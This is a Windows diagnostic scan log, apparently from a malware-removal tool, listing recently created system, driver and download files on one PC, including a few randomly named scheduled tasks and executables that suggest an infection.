2018-01-03 14:38 - 2018-01-03 14:44 - 083316440 _____ (Malwarebytes ) C:\Users\ouroboros\Downloads\mb3-setup-consumer-3.3.1.2183-1.0.262-1.0.3374.exe
2018-01-03 13:42 - 2018-01-05 09:35 - 000000000 ____D C:\AdwCleaner
2018-01-03 13:41 - 2018-01-03 13:42 - 008198432 _____ (Malwarebytes) C:\Users\ouroboros\Downloads\adwcleaner_7.0.6.0.exe
2018-01-03 10:47 - 2018-01-05 09:35 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Unity
2018-01-03 10:47 - 2018-01-03 10:47 - 000000000 ____D C:\Users\ouroboros\AppData\LocalLow\Unity
2018-01-03 10:41 - 2018-01-05 10:01 - 000003550 _____ C:\WINDOWS\System32\Tasks\Jasic
2018-01-03 10:41 - 2018-01-05 00:10 - 000003306 _____ C:\WINDOWS\System32\Tasks\aoIYY
2018-01-03 10:41 - 2018-01-03 10:41 - 000003724 _____ C:\WINDOWS\System32\Tasks\RfumFuaEoEEe
2018-01-03 10:41 - 2017-09-29 21:42 - 000174592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iYWHkUpEd.exe
2018-01-03 10:41 - 2017-09-29 21:42 - 000001153 _____ C:\WINDOWS\SysWOW64\eYyo
2018-01-03 10:41 - 2017-09-29 21:42 - 000000071 _____ C:\WINDOWS\aVPIeFZA
2018-01-03 10:33 - 2018-01-05 09:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2018-01-03 10:33 - 2018-01-05 09:35 - 000000000 ____D C:\Program Files\qBittorrent
2018-01-02 02:33 - 2018-01-02 02:48 - 204142693 _____ C:\Users\ouroboros\Downloads\ASMR EAR CLEANING ❤ Massage, Brushing, Cupping, etc!.mp4
2018-01-01 12:08 - 2018-01-01 13:26 - 716835388 _____ C:\Users\ouroboros\Downloads\fc2423128_hd.mp4
2017-12-28 13:49 - 2017-12-28 13:49 - 000000000 ____D C:\Users\ouroboros\Desktop\Emulators
2017-12-23 15:30 - 2015-09-30 23:20 - 000000000 ____D C:\Users\ouroboros\Desktop\iKON - WELCOME BACK (DEBUT HALF ALBUM) [www.k2nblog.com]
2017-12-21 11:33 - 2017-12-21 11:33 - 000001491 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-12-21 11:31 - 2017-12-21 11:31 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-12-21 11:31 - 2017-12-16 06:47 - 000143960 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-12-21 11:31 - 2017-09-14 07:20 - 000798008 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-12-21 11:31 - 2017-09-14 07:20 - 000490296 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-12-21 11:31 - 2017-09-14 07:19 - 000927544 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-12-21 11:31 - 2017-09-14 07:19 - 000591160 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-12-21 11:30 - 2017-12-16 08:23 - 000532976 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-12-21 11:30 - 2017-12-16 08:23 - 000438584 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 040237456 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 036350960 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 035157488 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 029381936 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 023267096 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 019040512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 013867656 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 013255032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 011781912 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 010883744 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 004202992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 003817584 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 003615032 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001990128 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438871.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001674736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438871.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001331016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001321448 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001135464 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001101104 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001044848 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001038496 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 001032688 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000980880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000933360 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000885680 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000794392 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000740144 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000634224 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000616240 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000599536 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000506864 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000045496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2017-12-21 11:28 - 2017-12-16 08:23 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-12-21 11:28 - 2017-12-16 08:23 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-12-21 11:22 - 2017-12-21 11:22 - 000000000 ____D C:\NVIDIA
2017-12-21 10:25 - 2017-12-21 10:53 - 461886288 _____ (NVIDIA Corporation) C:\Users\ouroboros\Downloads\388.71-notebook-win10-64bit-international-whql.exe
2017-12-19 08:25 - 2017-12-19 08:25 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2017-12-18 08:04 - 2017-12-18 08:50 - 000000068 _____ C:\Users\ouroboros\AppData\Local\lptx123456
2017-12-13 12:27 - 2017-12-13 12:27 - 000027552 _____ (REALiX™) C:\WINDOWS\system32\Drivers\HWiNFO64A.SYS
2017-12-13 10:13 - 2017-12-04 06:38 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-12-13 10:13 - 2017-12-04 06:38 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-12-13 03:18 - 2017-12-08 14:52 - 000666112 _____ (Microsoft Corporation) C:\WINDOWS\system32\DHolographicDisplay.dll
2017-12-13 03:18 - 2017-12-08 07:34 - 001925296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-12-13 03:18 - 2017-12-08 07:34 - 001634288 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2017-12-13 03:18 - 2017-12-08 07:34 - 000059800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bam.sys
2017-12-13 03:18 - 2017-12-08 07:31 - 008590744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-12-13 03:18 - 2017-12-08 07:31 - 000779440 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-12-13 03:18 - 2017-12-08 07:30 - 000166296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2017-12-13 03:18 - 2017-12-08 07:28 - 000710912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-12-13 03:18 - 2017-12-08 07:28 - 000630752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcrt.dll
2017-12-13 03:18 - 2017-12-08 07:27 - 004504456 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2017-12-13 03:18 - 2017-12-08 07:27 - 003903784 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-12-13 03:18 - 2017-12-08 07:27 - 000184984 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2017-12-13 03:18 - 2017-12-08 07:26 - 007385088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-12-13 03:18 - 2017-12-08 07:26 - 002709200 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-12-13 03:18 - 2017-12-08 07:26 - 000525208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimserv.exe
2017-12-13 03:18 - 2017-12-08 07:25 - 000374032 _____ (Microsoft Corporation) C:\WINDOWS\system32\vac.exe
2017-12-13 03:18 - 2017-12-08 07:24 - 000705944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimgapi.dll
2017-12-13 03:18 - 2017-12-08 07:24 - 000437144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-12-13 03:18 - 2017-12-08 07:24 - 000246168 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-12-13 03:18 - 2017-12-08 07:23 - 005905752 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-12-13 03:18 - 2017-12-08 07:23 - 000677272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-12-13 03:18 - 2017-12-08 07:22 - 001003104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-12-13 03:18 - 2017-12-08 07:22 - 000979352 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-12-13 03:18 - 2017-12-08 07:22 - 000137544 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcrypt.dll
2017-12-13 03:18 - 2017-12-08 07:22 - 000129432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvsocket.sys
2017-12-13 03:18 - 2017-12-08 07:21 - 007676296 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-12-13 03:18 - 2017-12-08 07:20 - 001170000 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-12-13 03:18 - 2017-12-08 07:19 - 021352136 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-12-13 03:18 - 2017-12-08 07:16 - 001776272 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-12-13 03:18 - 2017-12-08 07:16 - 000603920 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-12-13 03:18 - 2017-12-08 07:15 - 001426152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-12-13 03:18 - 2017-12-08 07:15 - 000721592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2017-12-13 03:18 - 2017-12-08 07:14 - 000571288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-12-13 03:18 - 2017-12-08 07:12 - 000401304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volsnap.sys
2017-12-13 03:18 - 2017-12-08 07:10 - 000362904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2017-12-13 03:18 - 2017-12-08 06:58 - 000123512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2017-12-13 03:18 - 2017-12-08 06:57 - 000649304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-12-13 03:18 - 2017-12-08 06:56 - 001528904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2017-12-13 03:18 - 2017-12-08 06:55 - 001490328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-12-13 03:18 - 2017-12-08 06:55 - 000097144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcrypt.dll
2017-12-13 03:18 - 2017-12-08 06:39 - 006092664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-12-13 03:18 - 2017-12-08 06:37 - 001145104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-12-13 03:18 - 2017-12-08 06:36 - 000769096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcrt.dll
2017-12-13 03:18 - 2017-12-08 06:34 - 003484840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-12-13 03:18 - 2017-12-08 06:34 - 002192112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-12-13 03:18 - 2017-12-08 06:33 - 000747416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-12-13 03:18 - 2017-12-08 06:33 - 000592280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wimgapi.dll
2017-12-13 03:18 - 2017-12-08 06:32 - 020286120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-12-13 03:18 - 2017-12-08 06:31 - 001522176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-12-13 03:18 - 2017-12-08 06:31 - 001246432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-12-13 03:18 - 2017-12-08 06:31 - 000982016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-12-13 03:18 - 2017-12-08 06:23 - 006478528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-12-13 03:18 - 2017-12-08 06:22 - 025245696 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-12-13 03:18 - 2017-12-08 06:13 - 002905600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-12-13 03:18 - 2017-12-08 06:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2017-12-13 03:18 - 2017-12-08 06:12 - 000344576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2017-12-13 03:18 - 2017-12-08 06:12 - 000202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-12-13 03:18 - 2017-12-08 06:12 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msscript.ocx
2017-12-13 03:18 - 2017-12-08 06:11 - 003669504 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-12-13 03:18 - 2017-12-08 06:10 - 018916352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 006466048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 001313792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\itss.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-12-13 03:18 - 2017-12-08 06:10 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-12-13 03:18 - 2017-12-08 06:09 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\batmeter.dll
2017-12-13 03:18 - 2017-12-08 06:09 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2017-12-13 03:18 - 2017-12-08 06:09 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscript.exe
2017-12-13 03:18 - 2017-12-08 06:09 - 000143360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cscript.exe
2017-12-13 03:18 - 2017-12-08 06:09 - 000136704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gamingtcui.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000450048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000206336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scrobj.dll
2017-12-13 03:18 - 2017-12-08 06:08 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000365568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000254976 _____ (Microsoft Corporation) C:\WINDOWS\system32\PushToInstall.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000246272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-12-13 03:18 - 2017-12-08 06:07 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\itss.dll
2017-12-13 03:18 - 2017-12-08 06:07 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2017-12-13 03:18 - 2017-12-08 06:07 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 023652864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000676352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000559104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcui.dll
2017-12-13 03:18 - 2017-12-08 06:06 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscript.exe
2017-12-13 03:18 - 2017-12-08 06:05 - 006037504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 001670656 _____ (Microsoft Corporation) C:\WINDOWS\system32\batmeter.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000664576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000559616 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\HolographicExtensions.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000481792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000363008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmsvc.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000306688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\scrobj.dll
2017-12-13 03:18 - 2017-12-08 06:05 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscript.exe
2017-12-13 03:18 - 2017-12-08 06:05 - 000019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 003678208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 001498112 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 001321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-12-13 03:18 - 2017-12-08 06:04 - 000568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 002467840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 001559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 001230848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000708096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000708096 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000594944 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000403968 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000308736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2017-12-13 03:18 - 2017-12-08 06:03 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\hascsp.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 007545344 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 002864640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 002117632 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 000815616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 000813056 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-12-13 03:18 - 2017-12-08 06:02 - 000496640 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 008097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 004592640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 001980928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2017-12-13 03:18 - 2017-12-08 06:01 - 000021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2017-12-13 03:18 - 2017-12-08 06:00 - 004740608 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-12-13 03:18 - 2017-12-08 06:00 - 002862080 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-12-13 03:18 - 2017-12-08 06:00 - 001509888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 003121664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 002105856 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-12-13 03:18 - 2017-12-08 05:59 - 001666048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-12-13 03:18 - 2017-12-08 05:59 - 000880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 003478016 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 003211776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 001547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 001353728 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2017-12-13 03:18 - 2017-12-08 05:58 - 000812032 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-12-13 03:18 - 2017-12-08 05:57 - 001822208 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-12-13 03:18 - 2017-12-08 05:57 - 001487872 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-12-13 03:18 - 2017-12-08 05:56 - 002666496 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2017-12-13 03:18 - 2017-12-08 05:56 - 001739264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-12-13 03:18 - 2017-12-08 05:56 - 000685056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-12-13 03:18 - 2017-12-08 05:54 - 002510336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-12-13 03:18 - 2017-12-08 05:54 - 001570816 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-12-13 03:18 - 2017-12-08 05:54 - 001160704 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-12-13 03:18 - 2017-11-27 04:35 - 017084416 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2017-12-13 03:18 - 2017-11-27 04:32 - 021754368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
